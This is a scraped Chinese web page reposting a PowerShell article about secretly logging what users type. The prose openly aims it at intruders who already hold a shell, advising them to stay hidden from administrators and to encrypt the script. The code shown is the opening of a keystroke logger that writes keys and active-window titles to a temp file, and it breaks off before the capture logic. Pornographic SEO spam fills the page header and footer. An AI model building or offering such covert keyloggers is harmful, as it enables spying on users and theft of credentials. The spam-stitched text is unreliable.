麻豆小视频在线观看_中文黄色一级片_久久久成人精品_成片免费观看视频大全_午夜精品久久久久久久99热浪潮_成人一区二区三区四区

首頁 > 開發 > PowerShell > 正文

PowerShell小技巧之定時記錄操作系統行為

2020-05-30 20:17:36
字體:
來源:轉載
供稿:網友

作為系統管理員,有些時候是需要記錄系統中的其他用戶的一些操作行為的,例如:當系統管理員懷疑系統存在漏洞,且已經有被植入后門或者創建隱藏賬戶時,就需要對曾經登陸的用戶進行監控,保存其打開或者操作過的文件。或者在另外一個場景,當黑客拿下一個普通權限的shell之后,想看看最近有哪些用戶登陸過,操作過什么,以便根據用戶習慣采取進一步行動獲取更高權限,這個時候記錄用戶行為就顯得很重要了。

      可能有讀者覺得此時安裝個監控軟件不就行了么,拜托,你入侵別人的系統,你裝個監控軟件,你把管理員試做無物么?這個時候PowerShell這個vista及其之后Windows操作系統都自帶的強大的命令行就有了用處,系統自帶,不會被管理員發現異常,腳本不用編譯,如果腳本內容再加個密,他們更猜不出是干什么用的,嘿嘿。如果要記錄幾個特性用于記錄啥時候干了什么,無非要記錄的有幾樣內容:操作,哪個文件或程序,時間。有這幾個特點就基本上可以掌握用戶的操作習慣了。
 
      代碼不算太難就不逐句解釋了,有啥問題的讀者可以給我留言詢問,基本上關鍵語句都有注釋的。代碼如下:

代碼如下:
 =====文件名:Get-TimedOperationRecord.ps1=====
function Get-TimedOperationRecord {
<#
    Author:fuhj(powershell#live.cn ,http://fuhaijun.com)
 Logs keys pressed, time and the active window.
.Parameter LogPath
    Specifies the path where pressed key details will be logged. By default, keystroke are logged to '$($Env:TEMP)/key.log'.
.Parameter CollectionInterval
    Specifies the interval in minutes to capture keystrokes. By default keystroke are captured indefinitely.
.Example
    Get-TimedOperationRecord -LogPath C:/key.log
.Example
    Get-TimedOperationRecord -CollectionInterval 20
#>
    [CmdletBinding()] Param (
        [Parameter(Position = 0)]
        [ValidateScript({Test-Path (Resolve-Path (Split-Path -Parent $_)) -PathType Container})]
        [String]
        $LogPath = "$($Env:TEMP)/key.log",

        [Parameter(Position = 1)]
        [UInt32]
        $CollectionInterval
    )

    $LogPath = Join-Path (Resolve-Path (Split-Path -Parent $LogPath)) (Split-Path -Leaf $LogPath)

    Write-Verbose "Logging keystrokes to $LogPath"

    $Initilizer = {

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 日本残忍极度灌浣肠视频 | 在线成人av观看 | 久久免费观看一级毛片 | 国产精品久久久久久久av三级 | 亚洲国产在 | 777午夜精品视频在线播放 | 久久99精品久久久久久秒播蜜臀 | 91社区电影 | 免费a视频在线观看 | 黄网站色成年大片免费高 | 9999免费视频| 广州毛片 | 九色一区二区 | 91九色网 | 久久老司机精品视频 | 成人午夜免费国产 | 日本在线观看视频网站 | 国产日产精品一区二区三区四区 | 成人啪啪色婷婷久 | 黄色av片在线观看 | 久久成人黄色 | 久久久久久久久久久亚洲 | 国产午夜精品在线 | 一区二区网 | chinese中国真实乱对白 | 欧洲成人一区 | 久久精品99久久久久久2456 | 亚洲综合91| 一色桃子av大全在线播放 | 久青草免费视频 | www.99久| 国产99精品在线 | 91国在线高清视频 | av电影直播| 亚洲欧美一区二区三区在线观看 | 成年人免费视频播放 | 久色成人网 | 黄色二区三区 | 欧美国产一区二区三区 | 午夜精品成人 | 国产乱淫av一区二区三区 |